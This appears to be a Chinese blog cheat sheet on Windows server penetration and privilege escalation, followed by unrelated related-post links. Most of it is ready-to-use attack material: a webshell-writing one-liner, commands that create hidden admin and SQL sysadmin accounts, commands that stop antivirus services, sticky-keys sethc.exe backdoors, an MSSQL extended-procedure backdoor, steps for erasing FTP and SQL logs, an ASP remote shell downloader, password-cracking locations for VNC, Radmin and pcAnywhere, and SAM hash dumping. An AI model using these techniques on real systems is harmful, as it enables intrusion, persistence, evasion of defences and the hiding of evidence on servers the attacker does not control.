旁站路径问题:
1、读网站配置。
2、用以下VBS:
03 |
If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then |
05 |
MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo" |
13 |
For Each obj3w In objservice |
15 |
If IsNumeric(obj3w.Name) Then |
19 |
Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT") |
21 |
If Err <> 0 Then WScript.Quit (1) |
23 |
WScript.Echo Chr(10) & "[" & OService.ServerComment & "]" |
25 |
For Each Binds In OService.ServerBindings |
27 |
Web = "{ " & Replace(Binds, ":", " } { ") & " }" |
29 |
WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "") |
33 |
WScript.Echo "Path : " & VDirObj.Path |
3、iis_spy 列举(注:需要支持ASPX,反IISSPY的方法:将 activeds.dll,activeds.tlb 降权)。
4、得到目标站目录,不能直接跨的。可以通过“echo ^<%execute(request(“cmd”))%^> >>X:\目标目录\X.asp”或者“copy 脚本文件 X:\目标目录\X.asp”像目标目录写入webshell,或者还可以试试type命令。
网站可能目录(注:一般是虚拟主机类):
CMD 下操作 VPN 相关知识、资料:
#允许administrator拨入该VPN:
1 |
netsh ras set user administrator permit |
#禁止administrator拨入该VPN:
1 |
netsh ras set user administrator deny |
#查看哪些用户可以拨入VPN:
#查看VPN分配IP的方式:
1 |
netsh ras ip show config |
#使用地址池的方式分配IP:
1 |
netsh ras ip set addrassign method = pool |
#地址池的范围是从192.168.3.1到192.168.3.254:
1 |
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 |
Cmd、Dos 命令行下添加 SQL 用户的方法:
需要有管理员权限,在命令下先建立一个“c:\test.qry”文件,内容如下:
1 |
exec master.dbo.sp_addlogin test,123 |
3 |
EXEC sp_addsrvrolemember 'test, 'sysadmin' |
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
另类的加用户方法:
在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下:
js:
1 |
var o=new ActiveXObject( "Shell.Users" ); |
5 |
z.changePassword("123456","") |
7 |
z.setting("AccountType")=3; |
1 |
Set o=CreateObject( "Shell.Users" ) |
5 |
z.changePassword "123456","" |
7 |
z.setting("AccountType")=3 |
Cmd 访问控制权限控制:
命令如下:
1 |
cacls c: /e /t /g everyone:F #c盘everyone权限 |
3 |
cacls "目录" /d everyone #everyone不可读,包括admin |
备注:
反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 – 文件夹选项 – 使用简单的共享去掉即可。
3389 相关,以下配合PR更好:
a、防火墙TCP/IP筛选.(关闭:net stop policyagent & net stop sharedaccess)
b、内网环境(lcx.exe)
c、终端服务器超出了最大允许连接(XP 运行:mstsc /admin;2003 运行:mstsc /console)
1.查询终端端口:
1 |
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber |
2.开启XP&2003终端服务:
1 |
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f |
3.更改终端端口为2008(十六进制为:0x7d8):
1 |
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f |
1 |
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f |
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制:
1 |
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f |
1 |
create table a (cmd text); |
3 |
insert into a values ("set wshshell=createobject (""wscript.shell"")"); |
5 |
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)"); |
7 |
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)"); |
9 |
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; |
BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。(注:一直忽略了在偏僻角落的那个功能)
关闭常见杀软(把杀软所在的文件的所有权限去掉):
处理变态诺顿企业版:
1 |
net stop "Symantec AntiVirus" /y |
3 |
net stop "Symantec AntiVirus Definition Watcher" /y |
5 |
net stop "Symantec Event Manager" /y |
7 |
net stop "System Event Notification" /y |
9 |
net stop "Symantec Settings Manager" /y |
麦咖啡:
1 |
net stop "McAfee McShield" |
Symantec病毒日志:
1 |
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs |
Symantec病毒备份:
1 |
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine |
Nod32病毒备份:
1 |
C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine |
Nod32移除密码保护:
1 |
删除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID”即可 |
安装5次shift后门,沾滞键后门,替换SHIFT后门:
5次SHIFT,沾滞键后门:
1 |
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe |
3 |
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y |
5 |
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y |
替换SHIFT后门:
01 |
attrib c:\windows\system32\sethc.exe -h -r -s |
03 |
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s |
05 |
del c:\windows\system32\sethc.exe |
07 |
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe |
09 |
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe |
11 |
attrib c:\windows\system32\sethc.exe +h +r +s |
13 |
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s |
添加隐藏系统账号:
1、执行命令:“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。
2、导出注册表SAM下用户的两个键值。
3、在用户管理界面里的 admin$ 删除,然后把备份的注册表导回去。
4、利用 Hacker Defender 把相关用户注册表隐藏。
安装 MSSQL 扩展后门:
3 |
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll'; |
5 |
GRANT exec On xp_helpsystem TO public; |
处理服务器MSFTP日志:
在“C:\WINNT\system32\LogFiles\MSFTPSVC1\”下有 ex011120.log / ex011121.log / ex011124.log 三个文件,直接删除 ex0111124.log 不成功,显示“原文件…正在使用”。
当然可以直接删除“ex011120.log / ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。
当停止“msftpsvc”服务后可直接删除“ex011124.log”。
MSSQL查询分析器连接记录清除:
MSSQL 2000 位于注册表如下:
1 |
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers |
找到接接过的信息删除。
MSSQL 2005 是在:
1 |
C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat |
防BT系统拦截技巧,可以使用远程下载shell:
03 |
Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl) |
05 |
Dim Ads, Retrieval, GetRemoteData |
09 |
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP") |
13 |
.Open "Get", s_RemoteFileUrl, False, "", "" |
17 |
GetRemoteData = .ResponseBody |
21 |
Set Retrieval = Nothing |
23 |
Set Ads = Server.CreateObject("Adodb.Stream") |
33 |
.SaveToFile Server.MapPath(s_LocalFileName), 2 |
45 |
eWebEditor_SaveRemoteFile "your shell's name", "your shell'urL" |
防BT系统拦截技巧,可以使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,用服务器安全工具一扫通通挂掉了。
VNC、Radmin、PcAnywhere 的提权方法:
首先利用 shell 读取 vnc 保存在注册表中的密文,然后再使用工具VNC4X破解。
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
Radmin 默认端口是4899,先获取密码和端口,如下位置:
1 |
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默认密码注册表位置 |
3 |
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置 |
然后用HASH版连接。
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有 PcAnywhere 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过 PcAnywhere 从本机登陆服务器。
保存密码的CIF文件,不是位于PcAnywhere的安装目录,而且位于安装PcAnywhere所安装盘的:
1 |
“\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\” |
如果PcAnywhere安装在“D:\program\”文件夹下,那么PcAnywhere的密码文件就保存在:“D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”文件夹下。
WinWebMail 提权加用户:
WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式,接下来,看路径,访问“路径\web”传 shell,访问shell后,权限是system,直接放远控进启动项,等待下次重启。
没有删cmd组件的可以直接加用户,7i24的web目录也是可写,权限为administrator。
1433 SA权限构建注入点:
03 |
strSQLServerName = "服务器ip" |
05 |
strSQLDBUserName = "数据库帐号" |
07 |
strSQLDBPassword = "数据库密码" |
09 |
strSQLDBName = "数据库名称" |
11 |
Set conn = server.CreateObject("ADODB.Connection") |
13 |
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" |
19 |
Set rs = server.CreateObject("ADODB.recordset") |
23 |
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3 |
提权篇:
先执行systeminfo
token 漏洞补丁号 KB956572
Churrasco kb952004
命令行RAR打包~~·
1 |
rar a -k -r -s -m3 c:\1.rar c:\folder |
收集系统信息的脚本:
05 |
echo #########system info collection |
17 |
net localgroup administrators |
21 |
net user administrator |
23 |
echo #######at- with atq##### |
29 |
echo ####task-list############# |
35 |
echo ####net-work infomation |
43 |
netstat -anipconfig /displaydns |
47 |
echo #######service############ |
49 |
sc query type= service state= all |
51 |
echo #######file-############## |
gethash 不免杀怎么获取本机 hash:
首先导出注册表:
1 |
Windows 2000:regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" |
1 |
Windows 2003:reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg |
注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)。
接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了
hash 抓完了记得把自己的账户密码改过来哦!
当 GetHashes 获取不到 hash 时,可以用冰刃把 sam 复制到桌面。据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~
- WINDOWS渗透与提权总结(2)
vbs 下载者: 01 1: 02 03 echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cft ...
- 小白日记21:kali渗透测试之提权(一)--本地提权
本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...
- 2018-2019-2 20165215《网络对抗技术》Exp10 Final Windows本地内核提权+Exploit-Exercises Nebula学习与实践
目录 PART ONE :Windows本地内核提权 漏洞概述 漏洞原理 漏洞复现 windbg调试本地内核 查看SSDT表和SSDTShadow表 查看窗口站结构体信息 利用Poc验证漏洞 漏洞利用 ...
- metasploit下Windows的多种提权方法
metasploit下Windows的多种提权方法 前言 当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以 ...
- LINUX渗透与提权总结
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: 001 /etc/passwd 002 ...
- 小白日记25:kali渗透测试之提权(五)--利用配置不当提权
利用配置不当提权 与漏洞提权相比,更常见的方法.在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵.当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行 ...
- 小白日记23:kali渗透测试之提权(三)--WCE、fgdump、mimikatz
WCE windows身份认证过程 http://wenku.baidu.com/view/cf2ee127a5e9856a56126017.html #特例在登陆的目标服务器/系统,有一个w摘要安全 ...
- metasploit下Windows下多种提权方式
前言 当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病 ...
- 转载:windows的mysql提权方式
mysql提权语句归纳如下: 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ...
随机推荐
- pandas 练习
from pandas import Series, DataFrame # Series接收list或dict作为一维数据 #两个属性:values, index #① s1 = Series([4 ...
- JS replace()方法-字符串首字母大写
replace() 方法用于在字符串中用一些字符替换另一些字符,或替换一个与正则表达式匹配的子串. replace()方法有两个参数,第一个参数是正则表达式,正则表达式如果带全局标志/g,则是代表替换 ...
- 城市区号SQL
今天写代码的时候需要用到全国城市区号,网上找了好久没有现成的SQL,于是自己录数据写了一个,和大家共享! 目前还只有300个城市的区号 文件下载地址放在最后! GO FROM sysobjects W ...
- 新年奉献MVC+EF(CodeFirst)+Easyui医药MIS系统
本人闲来无事就把以前用Asp.net做过的一个医药管理信息系统用mvc,ef ,easyui重新做了一下,业务逻辑简化了许多,旨在加深对mvc,ef(codefirst),easyui,AutoMap ...
- Linq之Expression进阶
目录 写在前面 系列文章 表达式树解析 表达式树特性 编译表达树 总结 写在前面 让我们首先简单回顾一下上篇文章介绍的内容,上篇文章介绍了表达式树的基本概念(表达式树又称为“表达式目录树”,以数据形式 ...
- SQL删除重复的记录(只保留一条)
首先新建表: --创建示例表 CREATE TABLE t ( id ,) PRIMARY KEY, a ), b ) ) --插入数据 INSERT INTO t SELECT 'aa','bb' ...
- C头文件之<cstring>
(string.h) 这个文件夹主要是定义了几个对字符串和数组进行操作的函数.功能很强大.下面是重要函数: strcpy.strncpy strcpy,strncpy 这两个函数是对字符串的复制,很常 ...
- HashMap 和 HashTable区别
HashMap 非线程安全的 HashTable线程安全的 package Collections.Map; import java.util.HashMap; public class HashMa ...
- Java设计模式-原型模式(Prototype)
原型模式属于对象的创建模式.通过给出一个原型对象来指明所有创建的对象的类型,然后用复制这个原型对象的办法创建出更多同类型的对象.这就是选型模式的用意. 原型模式的结构 原型模式要求对象实现一个可以“克 ...
- 【HDU 1757】 A Simple Math Problem
题 Description Lele now is thinking about a simple function f(x). If x < 10 f(x) = x. If x >= 1 ...